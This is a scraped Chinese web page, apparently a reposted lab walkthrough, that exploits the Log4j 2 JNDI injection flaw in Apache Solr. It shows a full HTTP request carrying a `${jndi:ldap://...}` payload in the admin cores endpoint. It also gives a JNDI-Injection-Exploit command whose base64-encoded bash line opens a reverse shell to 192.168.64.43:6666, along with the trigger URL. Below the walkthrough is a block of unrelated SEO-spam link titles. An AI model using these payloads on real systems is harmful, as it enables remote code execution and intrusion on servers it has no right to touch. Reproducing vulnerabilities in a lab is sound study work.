当前位置: 首页 > news >正文

私人让做彩票网站吗自己怎么优化我网站关键词

私人让做彩票网站吗,自己怎么优化我网站关键词,h5网站制作,青岛网站运营推广Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。…

Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入,执行任意代码。

1.服务启动后,访问`http://your-ip:8983`即可查看到Apache Solr的后台页面。

2.`${jndi:dns://${sys:java.version}.example.com}`是利用JNDI发送DNS请求的Payload,我们将其作为管理员接口的action参数值发送如下数据包:

GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1
Host: your-ip:8983
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close

3.我们可以在DNS日志平台收到相关日志,显示出当前Java版本:

4.利用工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all获得shell,

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjQzLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "192.168.64.43"

访问下面链接,成功反弹

http://192.168.188.128:8983/solr/admin/cores?action=${jndi:ldap://192.168.64.43:1389/08zqfe}

参考:hrrps://blog.csdn.net/Bossfrank/article/details/130148819

http://www.shuangfujiaoyu.com/news/30956.html

相关文章:

  • 网站上传图片加水印建站系统哪个好
  • 做网站的怎么办理营业执照关键词排名优化是什么意思
  • 秦皇岛哪家公司网站建设好百度推广客户端电脑版
  • win7 iis设置网站首页百度人工服务24小时电话
  • 庐江魅力网做网站号码网站seo诊断分析报告
  • 简历模板网站免费英文外链seo兼职
  • 塘厦东莞网站建设谷歌seo什么意思
  • 哪个网站做logo好乔拓云智能建站
  • 德州做网站的公司产品如何在网上推广
  • 怎么做最火的视频网站软文广告经典案例100字
  • 做网站的流程图营销策略ppt
  • 购物网站开发文献综述免费seo诊断
  • php 手机网站哪个网站做推广效果好
  • 音乐网站怎么做新东方在线koolearn
  • wordpress视频采集插件麒麟seo软件
  • 手机网站 像素seo是什么字
  • 企业动态网站开发周期seo软文是什么
  • 美观网站建设物美价廉收录提交入口
  • 网站效果图怎么做网络口碑营销名词解释
  • 网站建设与管理教学大纲微博推广方法有哪些
  • the7 做的网站nba体育新闻
  • 做个中英文网站多少钱武汉网站关键词推广
  • 政务网站模板google浏览器下载
  • 同主机网站查询输入关键词搜索
  • 源码网站建设教程长春网站公司哪家好
  • 主流网站百度推广售后
  • 电脑做服务器发布网站广州抖音seo
  • javaweb源码分享网站成都seo技术
  • wordpress 自定义侧边栏免费的seo网站下载
  • 注册电商网店怎么注册百度上如何做优化网站